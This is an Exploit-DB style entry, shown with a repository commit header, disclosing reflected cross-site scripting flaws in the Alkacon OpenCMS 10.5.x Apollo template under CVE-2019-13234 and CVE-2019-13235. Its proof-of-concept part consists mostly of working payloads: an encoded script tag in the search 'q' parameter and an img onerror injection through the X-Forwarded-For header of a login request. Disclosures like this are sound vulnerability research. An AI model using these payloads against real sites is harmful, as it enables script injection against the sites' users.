bc4836bfc1
12 changes to exploits/shellcodes ChaosPro 2.0 - SEH Buffer Overflow ChaosPro 2.1 - SEH Buffer Overflow ChaosPro 3.1 - SEH Buffer Overflow Kaseya VSA agent 9.5 - Privilege Escalation Cisco Email Security Appliance (IronPort) C160 - 'Host' Header Injection IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read Opencart 3.x - Cross-Site Scripting Wordpress Plugin Event Tickets 4.10.7.1 - CSV Injection Alkacon OpenCMS 10.5.x - Cross-Site Scripting Alkacon OpenCMS 10.5.x - Cross-Site Scripting (2) Alkacon OpenCMS 10.5.x - Local File inclusion Craft CMS 2.7.9/3.2.5 - Information Disclosure
30 lines
No EOL
1 KiB
Text
30 lines
No EOL
1 KiB
Text
# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
|
|
# Google Dork: N/A
|
|
# Date: 18/07/2019
|
|
# Exploit Author: Aetsu
|
|
# Vendor Homepage: http://www.opencms.org
|
|
# Software Link: https://github.com/alkacon/apollo-template
|
|
# Version: 10.5.x
|
|
# Tested on: 10.5.5 / 10.5.4
|
|
# CVE : CVE-2019-13234, CVE-2019-13235
|
|
|
|
1. Reflected XSS in the search engine:
|
|
- Affected resource -> "q"
|
|
POC:
|
|
```
|
|
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
|
|
```
|
|
2. Reflected XSS in login form:
|
|
POC:
|
|
The vulnerability appears when the header X-Forwarded-For is used as shown
|
|
in the next request:
|
|
```
|
|
GET
|
|
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
|
|
HTTP/1.1
|
|
Host: example.com
|
|
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
|
|
```
|
|
|
|
|
|
Extended POCs: https://aetsu.github.io/OpenCms |